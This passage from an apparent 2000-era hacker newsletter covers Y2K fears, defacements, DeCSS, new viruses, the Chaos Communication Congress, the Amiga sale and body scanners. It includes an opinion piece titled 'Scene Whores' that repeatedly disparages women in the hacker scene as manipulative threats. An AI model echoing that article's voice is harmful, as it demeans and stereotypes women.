hop online as a casual user and be taken advantage of. It is also easy for a fairly casual user to land a job in charge of the systems that govern your use of the Internet. Entrusting this kind of information into incapable hands is unnerving but it happens everyday. Bad people are out there, you know. The Dilemma We now have an equation that doesn't balance out. 
We have an extremely disproportioned Internet community that consists of ignorant masses that can be led by simple fear and heresy. On the other side of the fence we have that original handful[sizewise], some of which are running around like vigilantes for the good of the gangsters. The other piece of that pie is looking to ruin your life, take your credit card information, and load countless virii on your computer. It is very doubtful that something like this will happen to everyone[this is an extreme scenario], but you get the point. The broadcast ability that the Internet provides is a potential tool to instigate a nationwide scare. Imagine if a malicious user was to spam an authentic looking hoax proclaiming that a new generation of virus has infested itself in United States' vital computer systems and another country is extorting us. "By the way, I work for the Department of Energy. I'm not supposed to be releasing this. I am jeopardizing my job for the greater good here." It may be a little farfetched, however it's the principle that is important. Due to the media potentially telling an event such as this to the public with spokespeople "refusing to comment," we usher in an age where a simple rumor can affect an entire country in a very negative manner. Further banking off of the ignorance of the online community, people have authored worms cleverly disguised that are zipping around the world as you read this. The media tends to focus more on a scare tactic than an educative standpoint. This take on such events only breeds more ignorance and it discourages people from the truth of the matter. It is my fear that if you were to take a general poll of the streets asking fairly straightforward questions about the topics in this article you would get some pretty weird looks on people's faces. 
They would probably also tell you that they think "hackers" are the root of all evil and that they don't know much about the culture except that they "use viruses" and "fuck with people." Who is to blame? The Coverup One of the biggest misunderstandings of the general public is what really goes on behind the scenes. I will be the first to admit that the defacements that I have contributed to required little or no skill. While I may have capitalized on an existing vulnerability, the root of the problem is the same. You can code in as many languages as you want or be a total newbie and it is still just as easy to manipulate these vulnerabilities. If the general public knew how simple it was to actually compromise a server[excluding the hours/days/weeks to code and conceptualize, but to dotslash-hax0r], they would have a fit! Even more discouraging is the fact that such high profile sites fall victim to these attacks. This is what is depressing. Our so-called security experts have fallen to mere children fooling around after school. As regular Hackernews readers are probably informed, the state of the Internet is slowly deteriorating into a free-for-all. Which brings me to my next point, cyberterrorism. Most officials will attest that the United States is ready to defend against such attacks. However, at the current rate of growth concerning infrastructures and software chalking up the version numbers, staying on top of things these days is virtually impossible. A chain is only as strong as its weakest link, and I'll be damned if those webservers weren't some mighty weak links. Even though the majority of classified information is maintained through a SneakerNet[Nike or Reebok version 2.2 and higher], there are careless individuals who will leave sensitive data for the taking. The End Generally, people don't have much to fear. The army of computer-impaired will eventually find some way to evolve. 
I personally propose some sort of mandatory education concerning surfing practice and what exactly that big box that makes "clickity" noises really does. Perhaps then people will be a little more mature when their mouse disappears.

On the other hand, the governments of the world are frantically running around trying to save face. Reason? They don't want to be left behind. They know as well as we do that there are plenty more problems where the "Y2K Bug" came from. They are the ones that are going to be in charge of mediating the situations as they arise.

Time to panic? Not yet. Wait until 2028 when the seven-bit date blows[2^7=128]. Until then have a happy 19100.

YTCracker(phed@felons.org)
(c)2000 YTCracker and sevenonenine

@HWA

35.0 "Scene Whores" By Eric Parker/Mind Security 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

A buffer overflow HNN original article.

A well known, but overlooked threat to Hackers.

Scene Whores.

By: Erik Parker
Mind Security

Let me start off with a quick preface to give some explanation as to why I am writing this. First, this is going to seem like a very sexist article, as I will always refer to women as the scene whores, and use 'she' when speaking about scene whores. The reasoning behind this is, the majority of hackers are men. I did not go out and take a poll or anything, but I feel very safe in saying the majority of hackers are male. This paper may use examples that you might feel were written about you, or your situation, but the reason it seems like this, is because most confrontations with scene whores, are very much alike. I wanted to take Lance Spitzner's papers on "Know Your Enemy" and reword them to apply here, as script kiddies and scene whores are very much alike, they just use different common tools.

Now I know what you are thinking, that this article must be a joke, or that I must be writing it out of anger because of something that has happened to me.
Well yes I have first hand knowledge of the Scene whores, however I haven't been directly involved with one for a couple of years. This is spawning off of watching other relationships, and seeing many scene whores come and go, that have their reasons. If I had to speculate on why they do it, I would say a majority of them don't realize they are, that it is something in their subconscious making them do it. Whether it is for popularity in the "scene", or they think they will learn more by sleeping their way up the hacker ladder. This article is not a joke. They are a real threat. They waste our time, ruin friendships, cause chaos between hackers, and generally ruin periods of our life. A sure sign after being compromised by a scene whore, after they are done with you, is when you go to talk to friends you have neglected during the period of compromise, and they say "Welcome back, we missed you". However, what has to be figured out, is how to make there never be a period of time like that. Scene whores can be found in several places. I think a very common one is on IRC. Other places like 2600 meetings, Conventions (Like Defcon), and even meet them through your friends, who may have met them in the above mentioned ways. Some very unlucky guys get scene whores right from the start, when they first turn into it. The scene whore has decided that Hackers look glamorous, or they find out how large your salary is, compared to hers, her current boyfriend's, or even her parents combined. We are a rare species I suppose, we are in an age where we wear what we want, we don't necessarily need a college background, we are making 6 digit figures, and setting the rules for ourselves. Any way you look at it, scene whores can look and think that we have power, money, and we are the stereotyped "cool". Some of us are all of the above, and into drugs, and many girls find drugs to be an attractive feature.
I don't have a lot of experience with scene whores and drug related things, as I went a different direction and stayed away from most of the drug scene. There is a very classic approach that is seen in most cases. This is an easy one to see coming, if you do a little history research about the possible scene whore before you get involved. The Ladder approach is what I like to call it. In most cases when dealing with a ladder, you start at the bottom and work your way up. Just like the scene whore does. They try to get networked into the scene by finding someone who knows something, or at the very least, knows someone who knows something. If they are good looking, or partially good looking and easy, they have no problems with this approach. There is one good thing to say about the majority, most of them learn something on the way. If nothing else, they usually learn what the internet is, how to IRC, how to login to NT, and maybe even how to work IRC under a non-windows platform. They will go with bottom rung hacker for a little while, and then once the scene whore has met enough of the hackers friends, or actually gets to be known a little bit, and meets a few people on their own, they find someone more interesting.. Someone who seems smarter, and has more friends, or has been in the media more, or has some noted accomplishments. Usually this person is a friend, or acquaintance of the first hacker. They move on, and this usually destroys the friend with the new target, and the old target, as well as with the scene whore, and the old target. One term scene whores should learn is, be nice to hackers on your way up, because you will be seeing them again on your way up again. Hopefully we can start identifying scene whores quicker, and securing ourselves against them quicker, and put them out of commission. In the above mentioned method, scene whores can make it up just a few guys, or make it along dozens of people. 
You can get a good idea of how many people scene whores sleep with by reading the Hacker Sex Chart. You will notice some scene whores with a dozen or more links on there. You will notice some very well known people on that list, and notice even they got sucked into the claws of a scene whore before. Scene whores who sleep around, and think that sex will gain them knowledge find out in the end that they are just worthless whores who had a good time, and probably picked up more diseases than knowledge. There are other methods.. Or lack thereof, that scene whores use. Some are not in it just to get to the top. Some are in it, just to meet as many people as they can, and have as much "fun" as they can. These are Good looking scene whores, to the nastiest of scene whores. There is always a hacker, or a perhaps a drunk hacker, that will do the nastiest of scene whore. These ones are even worse than the Ladder Climbers, as they usually tend to sleep with more people, have less commitments. Well, this depends. They aren't as bad as the ladder climbers in the way that they don't consume as much of the hackers precious time, and usually don't make people leave their friends. These girls do however tend to breakup more friendships than the ladder climbers, as they cover more ground. The friendships that were strong usually get repaired though, as they quickly realize she was a scene whore. These scene whores are usually detected a lot quicker than others. Then there are the extremely ignorant scene whores. The ones that make the other types look intelligent. These are the ones who watched the movie 'Hackers', and have only heard about the criminal side of hackers. They want to get into it for the feel of doing something bad. Thinking they will find a group of hackers that can get them millions from a bank, or do something so illegal that it turns them on. You know the types, the types of people who get excited at the thought of doing something naughty. 
Like having sex in a church during Sunday morning gatherings. These scene whores usually only end up finding stupid web site defacers, who introduce them selves as hackers, when they are really mistaken, and are just script kiddies and crackers. Sometimes these hackers actually do something illegal, and the scene whore finds it very erotic and loves it. A few weeks later the Cracker is arrested, and the scene whore testifies against them, and the cracker gets fined, spends time in jail, or ends up without their computer for years. Now the hard part is.. To determine which ones aren't scene whores. The ones who have been with other hackers, but are true and honest, and like you for who you are. I can't say the best way to determine this. I think it is easier to just try and detect the scene whores, and eliminate them, than to try and find a way to detect non-scene whores, if that makes any sense to you. There are cases where the non-scene whore had legitimate relationships with other hackers, and it just happens that you are the right person for them. The fact that you are a hacker has nothing to do with it. They aren't out for your money, for your friends, to be in the news papers, or to see you commit crimes on computers. There is a possibility I am looking at this all wrong, and of course most of this is based off of what I have seen, my thoughts and opinions. There are hackers who like scene whores, because they know it won't last, but it is like an adventure. However the hackers who like the scene whores usually leave time for their friends, and don't get swallowed up by them. However, these hackers help contribute to keeping scene whores around, and eventually the scene whores they let stick around, will end up ruining some other hackers life, or a period of it anyway. Last, I contemplated doing this article for some time. 
It is a controversial subject, especially because of what I mentioned in the preface, that it seems biased against women, and that it generally applies to them, and because of the number of men Vs. the number of women that are real hackers, and because I have never seen a guy go around and sleep with as many hacker women as he could, I can't really put the article into that perspective. On another note, just to reiterate what I said in the start, this article is not about you, or anyone you know. It is not about anyone period. It is about the concept of scene whores, why they do it. I would have added in on how to stop them, but the only way to stop them is to identify them, and to control yourself. Think with your head, and not any other part of you. As well, if you do happen to get in with one, get health insurance, because it could do serious damage to your heart.

Thanks to the Proof Readers: Anonymous xs

@HWA

36.0 DVD Control Association Loses First Round 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Santa Clara County Superior Court Judge William Elfving has denied the DVD Copy Control Association's request for a restraining order against numerous web sites and individuals. The DVD CCA had hoped that the restraining order would prevent people from distributing DeCSS, a program written to allow the playing of DVD movies on regular computers and not DVD players. While the restraining order was denied, the war is not over yet. Trial has been scheduled for January 14, 2000. The EFF provided preliminary legal assistance in this case.

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/19991229/tc/dvd_copying_suit_3.html

Industry Standard - via Yahoo
http://dailynews.yahoo.com/h/is/19991229/bs/19991229242.html

Electronic Defense Foundation
http://www.eff.org/

HNN's copy of the legal complaint
http://www.hackernews.com/special/1999/dvdinjunction.html

DeCSS Defense Site
http://www.lemuria.org/DeCSS/

DVD Copy Control Association
http://www.dvdcca.org/dvdcca/index.html

@HWA

37.0 First Viruses of the New Year Discovered 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The Ringo and turtlex

Computer Associates has announced the discovery of the first new virus/trojans of the new year. While some of the four pieces of code that have been discovered do contain destructive payloads none of the four are considered extremely dangerous. (Four? That's it? Where are the predicted 30,000 Y2K viruses?)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2415783,00.html?chkpt=zdhpnews01

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/19991231/tc/yk_computerassociates_1.html

Say hello to Feliz.Trojan and Armagidon

CA spends weekend publicizing low-grade viruses. The latest two pack some punch, but appear little more virulent than WScript.Kak, Trojan.Kill.

By Robert Lemos, ZDNet News
UPDATED January 2, 2000 2:48 PM PT

It's already been a busy new year for virus watchers at Computer Associates International Inc., which used the weekend to issue the first virus warnings of the year 2000. CA (NYSE: CA) followed up two earlier warnings with two more on Sunday, issuing releases warning of Feliz.Trojan and Armagidon, a new Word macro virus. Both are potentially destructive. Feliz.Trojan can cause PCs not to boot, and Armagidon can cause documents to print with incorrect characters. Armagidon will also replace the Windows mouse pointer with a Red Cross symbol on May 8, which is Red Cross Day.
CA officials were not immediately available to assess the potential virulence of these new viruses. There was no mention of them on other virus sites. The other viruses CA issued warnings of were not considered very dangerous. On Saturday, CA released an alert that warned users of Wscript.Kak, a worm that spreads via systems that use both Microsoft Windows 98 and the Microsoft Outlook Express 5.0 e-mail client. A company official acknowledged that Wscript.Kak was not particularly virulent. "From a risk perspective, this is fairly low. You have to send an e-mail for it to spread," said Simon Perry, security business manager at CA in an interview with ZDNN on Saturday. "A self-propagating virus, like Melissa, will spread itself to several others automatically, and by the nature of the propagation you get a threat." While the Melissa macro virus, which struck thousands of companies last March, required the user to open an attachment, once that had occurred the virus spread exponentially. Like Melissa, Wscript.Kak does not appear to do any damage to systems, but merely spreads itself by attaching a copy of the virus onto every e-mail that a user sends. That makes it a potential nuisance, at worst. The systems of corporate and home users that have turned off scripting -- a recommended strategy after the appearance of BubbleBoy two months ago -- will not be infected. "Though this virus isn't Y2K-related, its discovery further confirms that hackers will exploit fears throughout the Y2K changeover," Perry had said in a press release issued Saturday. The statement seemed somewhat ironic, since the lack of a malicious payload or any mention of it by other anti-virus firms suggested that CA itself is capitalizing on those fears. Perry told ZDNN that a CA client found the worm, so that even though the virus has been classified as "low risk," the company believed publicizing it was the best course. 

Has potential to spread

One aspect of the worm that could lead to its spreading quickly is that users don't have to click on an attachment to trigger the malicious code. If a user's Internet Explorer security settings are set to low or medium, the worm will infect the system without any user action, said the company. The worm will then go on to change the signature settings of the user's mail to its own and then attach itself to every e-mail message the user subsequently sends. Users who have the Windows Scripting Host option turned off will not be susceptible to this, or any, scripting virus. After infecting the computer, the worm will shut down Windows. After the system reboots, the worm will be running in the background, waiting to infect every e-mail the user sends out. Otherwise, CA doesn't report any malicious payload in the virus.

Trojan.Kill more destructive

Earlier this week, CA reported another virus distributed through pirated copies of Windows 98 operating systems. The virus, known as Trojan.Kill, could wipe out information saved on computers when their dates roll past Jan. 1. "Since Trojan.Kill is directly related to Y2K and carries a destructive payload, we're concerned about the damage it can do," said Perry. "Obviously this virus is specifically targeted at illegal software, and Computer Associates strongly recommends that all software deployed either in the business environment or for home use is a legal copy," Perry said in a statement. pread through traditional means such as e-mail, shared drives or floppy disks, Trojan.Kill hides behind a setup file called "Instalar.exe."

Reuters contributed to this report.

-=-

Reuters:

Friday December 31 7:34 PM ET

Computer Associates Warns of New Viruses

NEW YORK (Reuters) - Computer Associates International Inc. Friday warned of several computer viruses the company said were part of a string of viruses timed to take advantage of fears about the changeover to the Year 2000.
The Lucky 2000 virus, which runs on Microsoft Windows 95, 98 and NT platforms, infects files that use the Visual Basic programming language, Computer Associates said. The virus wipes out the content of the file but does not change the name so a user will not know a file has been infected until it is run. Lucky 2000 sends users to a Russian Web site when they try to run infected files. The company also warned about the Esmeralda.807 virus, which causes a delay when a user opens a 32-bit Windows file, making it appear that the computer has temporarily frozen. The Spaces.1633 virus harms the start-up function of the computer. A separate virus, called Zelu.Trojan, has the potential to destroy all files on an infected machine while pretending to be the antidote to a Y2K bug. It arrives as an executable with the name Y2K.EXE. ``All computer users must take extra precautions during this virus onslaught,'' said Simon Perry, business manager of security at Computer Associates. ``We can't stress enough the importance of powerful and reliable antivirus software as virus writers continue to exploit user fears on the eve of Y2K.'' Computer Associates said further virus-related information is available at http://www.cai.com/virusinfo, and it said it is offering free downloads of antivirus software for personal use at http://antivirus.cai.com. The company provides software, support and integration services, mostly to businesses. Shares of Computer Associates closed down 7/16 at 69-15/16 on Friday on the New York Stock Exchange.

@HWA

38.0 Reports from Chaos Computer Congress 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

Steve Kettmann reports from Germany for Wired on the 16th annual Chaos Communication Congress. (There isn't much new in these reports if you have ever been to any con before.)

Wired - CCC Women Were Odd Men Out http://www.wired.com/news/culture/0,1284,33346,00.html Wired - Oh, How the CCC Has Evolved http://www.wired.com/news/culture/0,1284,33342,00.html CCC Women Were Odd Men Out by Steve Kettmann 9:35 a.m. 30.Dec.1999 PST BERLIN -- There was a lot of talk about family and community at this year's Chaos Computer Club annual congress. But a lot of women were wondering: Whose family? To call Chaos male-dominated is a vast understatement. And that didn't go down too well in some quarters. To mollify the women who were there, they were promised a "hack center" of their own. But the hordes of pasty-faced teens with monitors under their arms needed space, and they took over the room. An open confrontation ensued. "Some of them said they didn't think a women's room was necessary," said Nina Corda, an ISP hotline worker from Bremen who was a key organizer of the women's room. "They said, 'Just because you're a woman doesn't mean you get special treatment.'" Corda, a smiling woman who speaks fondly of her days street-fighting against neo-Nazis, was not about to sit still for that sort of talk. "We are marginalized in the CCC," she said. "Just take a look around." Corda appealed to the CCC leadership. The top logistical organizer for the conference, Tim Pritlove, finally relented and transformed it back to a women's room. Several women-only workshops were held, including one on Linux instruction in which about 25 attended. It was a victory in the sense that even though women comprised only about 10 percent of the total attendance, they still were a presence. "When I asked Tim, he said it didn't look like we were doing anything in the room, because we had only set up one computer," Corda said. "I said, 'Hacking isn't only about computers. It's a state of mind.' Technically, I'm not the strongest. For me it's more a political thing. "Hacking to me is about always wanting to know more, and not thinking that you already know it all." 
As a sort of compromise, this year's women room was not called a "women's room" but a "know-it-all free zone." "They were not that rare and exotic as last year, but it's still a small group," said CCC spokesman Andy Mueller-Maguhn. "I wouldn't say it's a problem. What's remarkable is not so much the number of women but their handling of computers and their handling of the situation. In my point of view, the women are starting to get really cool and really tough. They have a status of self-consciousness which is really remarkable. They say very loud and clear what they want." Interviews with women at the congress revealed a split. One group favored a more combative demand for inclusion. Another group believed more in jumping right in and making a longer-term bid for influence. "We will take over within 10 years," joked Nika Bertram, a member of the Kologne CCC. "You have to do things on your own," she said. "What cyber-feminism wants is to find its own way, and then talk to the men, and not hear, 'Your way is not the right way.' Maybe it's better not to have men telling you how to do things.' But it's actually a very open scene. The boys are very nice. We like them. No one ever said, 'There is the coffee machine.'" Kologne CCC member Christine Ketzer, who helped lead a workshop titled "Big Brother Is Watching," agrees. "Some women aren't interested in technology for technology," she said. "They are more interested in the social angle. It's really important for women to make themselves visible in the scene. It's very important to talk about the real serious topics and to become network administrators and things like that." Ketzer and Bertram both thought that the women they knew in the scene tended to shy away from speaking out and making their presence felt. Mueller-Maguhn made much the same point in explaining why more women were not scheduled to lead workshops. 
"Back in November, I sent out emails asking everyone who they wanted to hear, and there were no suggestions like that," he said. "I think it has to do with presenting yourself, and that is more of a man's domain." It was all disturbingly familiar to Rena Tangens and Barbara Thoens, the most famous women CCC veterans. Tangens attended her first CCC congress in 1988. "I was shocked," she said. "I was the only woman there. Well, there was one other woman there, but she was making cake. I decided I had to do the job myself. I led a workshop the next year on finding the advantages of different approaches to computers." Thoens soon joined in, and in the mid-90s served a two-year term as CCC president. The two women made a video making sport of how men explain technology. "They say, 'Let me do it,'" Thoens said, and both women laughed. But this year's fight over a women's room, one they thought they had settled years ago, left both feeling sad. "It's not fair," Tangens said. "It's just looking at the male view and ignoring everything else." Added Thoens: "The way of communicating between men is very loud and noisy, especially in the Berlin CCC. I like that, but some women don't. The men say the women have to shout, too, if they want to be heard. I always try to explain our concept and the men don't understand. I tell them 'It's good for you if there are a lot of women.' But the Berlin group would be happy if it was all men, just so long as you're seriously interested. "I think next year it will be really difficult again organizing the women's room." -=- Wired #2: Oh how CCC has evolved Oh, How the CCC Has Evolved by Steve Kettmann 9:35 a.m. 30.Dec.1999 PST BERLIN -- It says everything about how the Chaos Computer Club has evolved over its 16 years that Internet access kept disappearing at this week's annual congress, and the main reaction was easy-going jokes. 
The three-day congress was held in an old East Berlin official building called the Haus am Köllnischen Park, the former training school for East German party members. Technical limitations prompted CCC techies to opt for Web access via a radio hookup, and the results were repeated, hours-long interruptions. "The times the Internet doesn't work, we have more people in the workshops," CCC spokesman Frank Riegr observed. If it seems like there is no such thing as hacking without an Internet connection, well, time to update. To many at the congress, "hacking" meant anything from thinking creatively to questioning authority to getting a buzz going. The hacker persona has changed a lot since 1984, when CCC co-founder Steffen Wernery was organizing the first annual congress. "It was illegal to have a modem," he said. "You looked like a criminal if you had a computer and a phone connection. Now every computer has that." Lock-picking to us?: Once again, as at last summer's CCC-sponsored hacker camp outside of Berlin, the lock-picking workshops and competitions were a big hit. Tool kits were on sale, and practical information was abundant on how to use simple tools to make locks melt like butter. Lock-picking sport clubs have popped up all over Germany, spawned by the example of the Hamburg club, a spinoff of the CCC. But Wernery, the club president, said that of its 500 members, only 13 are CCC members. Membership really took off after last summer's camp. "Since the camp, we have a lot of international contacts," he said. "There are clubs now in France, Finland, the Netherlands." Next stop? America, of course. Wernery and his followers are trying to organize a trip to New York City for H2K, an American hacking gathering scheduled for 14-16 July. Last year's German lock-picking champion, Johannes Markmann, tried to capture the allure of what he and the others are spending so much time doing. "The idea is to break taboos," he said. 
"A taboo is only a taboo if you don't speak out about it. It is art, what we do." Added Wernery: "The only problem is the (lock-making) industry, which is selling such bad stuff."

Game fever: There was some internal controversy over just what was being done on the hundreds of computers brought by congress attendees. Seems there's something of a videogame problem. Quake is more like a cult in CCC land. "It's a hack center, not a game center," said one typically outraged participant during the closing discussion session. "If we continue like this, the congress will be just a party under a tent in five years."

Media blackout: If there was any consensus among CCC members, it concerned the media: Keeping them away was a good idea. The number of attending journalists has shrunk to about 30, down from 100 one year ago. "We did nothing to encourage journalists to come this year," Riegr said. "We wanted the congress to be more for the CCC family, and to give us a chance to think about what we are doing, and not to share that with the public."

@HWA

39.0 Gateway Sells Amiga 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The old favorite Amiga has been sold once again. This time Gateway, the most recent owner of the Amiga name and technology, has sold it all to a company known as Amino Development Corp. Faithful Amiga users around the world had hoped that Gateway would revive the brand when they acquired it back in 1997. Evidently they will have to wait a little longer. However, since Amino is run by Bill McEwen, the former Amiga, Inc. marketing chief, they hopefully won't have to wait very long.

Reuters - via ABC News
http://abcnews.go.com/wire/US/reuters19991231_1089.html

The UK Register
http://www.theregister.co.uk/991231-000006.html

Gateway Sells Rights to Amiga Name

NEW YORK (Reuters) - Personal computer maker Gateway Inc.
(GTW.N) signed a deal to sell its Amiga trademarks and computer systems to closely held Amino Development Corp., the companies said on Friday. Terms of the deal were not disclosed. Gateway senior vice president Peter Ashkin said in a statement the company elected to sell the Amiga name after deciding to wrap Amiga's software engineering function into Gateway's product development systems. San Diego-based Gateway, which acquired the rights to Amiga's technology in 1997, had been planning to revive the brand, prominent in the mid-1980s, for so-called information appliances and PCs. Gateway's shares closed at 70-1/8 on Thursday on the New York Stock Exchange.

-=-

Posted 31/12/1999 8:23pm by Tony Smith

Gateway sells Amiga to ex-Amiga employee

Gateway has finally rid itself of the legacy of its acquisition of Amiga with a close-of-year sale of the Amiga hardware spec., system software and brandname to Amino on undisclosed terms. And who do we find runs Amino? Step forward, Bill McEwen, the former Amiga, Inc. marketing chief who quit the company earlier this year just before ex-president Jim Collas was given the boot. McEwen is well respected by the Amiga community, so his acquisition of the Amiga is likely to be received positively -- doubly so since Gateway has long been viewed as the Amiga world's chief bete noire, responsible not only for giving Collas the push but for masterminding the software-only strategy pursued by his successor, Tom Schmidt, a move that for many Amiga users was a tacit admission that Gateway was never really interested in reviving the Amiga brand. In fact, it may well have been interested in doing just that but to use it as the basis for its own Internet appliance line. The snag here is the brand's poor level of recognition outside the community, and the company may have felt that a new brand, one not sullied by years in the IT wilderness, is probably more appropriate.
The work on the next-generation software technologies begun under Collas and continued under Schmidt will be folded into Gateway's own Net device product development operation, the company said. Not surprisingly, the deal doesn't include Amiga-related patents awarded since 1997 -- Gateway is hanging on to those. Given Gateway's lack of interest in the 'classic' Amiga, the sale should at least see its continued existence as a computer platform. As yet, Amino hasn't said what its plans are for the classic Amiga, but a move into the open source world seems a likely move. The Campaign to Open Source the Amiga (COSA), has been negotiating to open up the classic Amiga OS for some time, so far without success (though Schmidt did seem broadly receptive to the idea). COSA's argument is that the Amiga platform only has a future if it expands its user base, and the best way of doing that is to open it up in the hope of winning the same kind of broad support that Linux has achieved. Certainly, the influx of new talent that such a move would encourage if the Amiga platform isn't to dwindle further and become nothing more than a refuge for die-hards and 80s retro fans. ®

@HWA

40.0 CIH Author Hired by Taiwanese Company 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Yazmon

Wahoo International Enterprise Co has announced that it has succeeded in luring Chen Ing-hau away from rivals after the 24-year old completed his military service. Chen has admitted to writing and releasing the deadly CIH virus during his military tour. He was quickly arrested following his confession but was released due to lack of complaints brought against him.

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/19991230/tc/virus_taiwan_1.html

Thursday December 30 12:13 AM ET

Taiwan Tech Firm Hires Chernobyl Virus Author

TAIPEI (Reuters) - A Taiwan technology firm keen to test its own hardware has hired the super-hacker who created the notorious Chernobyl virus -- which laid waste to hundreds of thousands of computers worldwide in April. Wahoo International Enterprise Co said it recently fought off a score of high-tech rivals competing to lure Chen Ing-hau after the 24-year-old completed Taiwan's mandatory military service. A remorseful Chen admitted he wrote the stealthy computer program during his tour of military duty, and was arrested in April but soon released because no complaints were filed in Taiwan. The virus, also known as CIH, wipes out an infected computer's hard drive data every April 26 -- the anniversary of the 1986 Soviet nuclear disaster at Chernobyl, Ukraine. Chen's rogue program hit hardest in countries with weak anti-virus defenses, gumming up hundreds of thousands of computers in South Korea, Turkey and China and thousands in India, Bangladesh, the Mideast and elsewhere. ``Our chairman felt he was a rare computer professional and we decided to accept him with an open heart,'' said Wahoo spokeswoman Vivi Wang. Chen works in Wahoo's hardware testing department, she said. Wahoo, which makes multilingual Linux operating systems, has said it plans to list its U.S. arm, XLinux.com, on the Nasdaq stock market by June 2000.

@HWA

41.0 Body-Scanners Used by US Customs 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The US Customs Service has begun using new high-tech scanners that can see through the clothing of passengers and can search for contraband with an image that shows the naked body. As an alternative to a physical pat-down, frisk or strip search, suspected international smugglers are being offered the body scanner.
To insure privacy customs officials have said no image of the naked body is recorded or preserved. (Yet. Wait until 'body matching' can be done as easily as fingerprinting then they will start collecting data to compare new scans against.)

Boston Globe
http://www.boston.com/dailyglobe2/365/nation/Rights_backers_fight_scanner_that_gets_under_clothes+.shtml

Rights backers fight scanner that gets under clothes

Customs uses it to seek contraband

By Michael Arena Newsday, 12/31/1999

NEW YORK - With airports bracing for Y2K problems and possible terrorism, the US Customs Service has begun using new high-tech scanners that can see through passengers' clothing and search for contraband with an image that shows the naked body.

International travelers who are suspected of smuggling drugs or carrying weapons are being offered the body scanner as an alternative to a physical pat-down or frisk when they pass through ports of entry at airports across the country.

The scanner can display hidden guns, knives, batteries, digital watches, explosive materials and packages of drugs secreted under clothing.

Supporters say scanners can help in the fight against terrorism and illegal drug importation.

But privacy advocates say the technology's capability to show the full external contours of the body, including male and female private areas, is an ''electronic strip search'' that erodes constitutional protections and is more invasive than a frisk, which is performed while a suspect is fully clothed.

Customs Commissioner Raymond Kelly says the body scanners give travelers the choice of avoiding the physical contact of an external body search at the hands of an inspector.

''The option is that we can pat you physically,'' he said, ''or you can step in front of this machine. You don't have to do it.''

To insure privacy, no image is recorded or preserved, he said. And the scanner operator is always the same sex as the person under scan, said Kelly.

But Gregory T. Nojeim, legislative counsel for the American Civil Liberties Union, has been fighting the technology since it was first proposed as a security enhancement three years ago after TWA Flight 800 exploded off Long Island.

He told an aviation safety conference shortly after the crash that ''the system has a joy-stick driven zoom option that allows the operator to enlarge portions of the image.''

The image is not in photographic detail, but it does provide a clear outline of the person's body.

The manufacturer of the BodySearch device said that the concerns are excessive. Robert Peters, vice president of American Science and Engineering of Billerica, said ''You don't get a sharp line image.'' Scanning private areas is necessary because ''that's one of the places where people hide stuff.''

The Customs Service began installing bodyscanners over the last several months as part of Kelly's overhaul of inspectional procedures in response to charges of racial profiling and a congressional hearing that followed.

Black women in particular have complained that they were singled out for pat-downs, and a group in Chicago has filed a class-action lawsuit against the agency.

The Customs Service was unable to provide numbers for those who have opted for scanning over frisks, and how many of these scans turned up contraband. Scanners were recently installed at terminals in New York, Miami, Atlanta, Los Angeles and Chicago at a cost of about $125,000 each.

Nojeim said the body scanners are eroding constitutional rights. He cited other dangers.

''It gives passengers a false choice designed to make them feel better about being subjected to an intrusive search conducted without probable cause of a crime. And it runs the risk of making airport search much more common.''

But Peters responded that the scanner is an improvement over the frisk. ''A patdown requires a touching of the private area. A scanner never touches anyone. You are never invading a person's private space,'' he said.
This story ran on page A12 of the Boston Globe on 12/31/1999. © Copyright 1999 Globe Newspaper Company.

@HWA

42.0 Defacements Continue Unabated in the New Year 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

For some reason web site defacements continue to make news. While there were dozens of defacements over the last few days those of Lloyd's of London, The UK railways services company Railtrack, and the German Police actually caused a big enough stir to grant some news coverage. None of the defacements caused any permanent damage and all were fixed very quickly.

BBC - Railtrack defacement
http://news.bbc.co.uk/hi/english/sci/tech/newsid_585000/585227.stm

Associated Press - via San Jose Mercury News - Railtrack defacement
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/068585.htm

Reuters - via Wired - Lloyd's of London defacement
http://www.wired.com/news/business/0,1367,33390,00.html

Reuters - via Excite - German Police Union defacement
http://news.excite.com/news/r/991230/08/odd-hack

Attrition.org Defacement Mirror
http://www.attrition.org/mirror/attrition/2000-01.html

As of this writing Attrition has been down due to hardware problems (they lost the main hard disk on their machine). Radius.net is taking over mirroring of defacements while they are down (http://www.radiusnet.net/mirror). Notification of defacements can be sent to hacked@radiusnet.net.

BBC:

Hackers target UK rail information

Hackers broke into and distorted Railtrack's internet home page on Friday as a Y2K prank.

The website provides online timetable information for travellers using the UK's railway services.

The message from the hackers read: "Sorry, but due to the Y2K compatibility problems there will be no trains operating between 31-12-99 and 02-01-00."
The hackers then sent their greetings to "all the Railtrack directors, all the sheep in Wales" and acquaintances with names like HackUK, Rootworm and Slacker.

Railtrack quickly corrected the site.

A Railtrack spokeswoman said: "This is a prank that is supposed to be amusing.

"Unfortunately it will affect hundreds and thousands of people who are trying to get into London for the millennium eve celebrations.

"We would like to reassure all our customers that trains are running as published."

Railtrack has spent four years checking and correcting its computers.

The company, which is responsible for all the track, signals and some stations in the UK's privatised rail network, was deemed to be 100% compliant under the government's Action 2000 millennium readiness "traffic light" assessment process.

It is also operating a command centre through to the end of March to co-ordinate Year 2000-related problems that crop up.

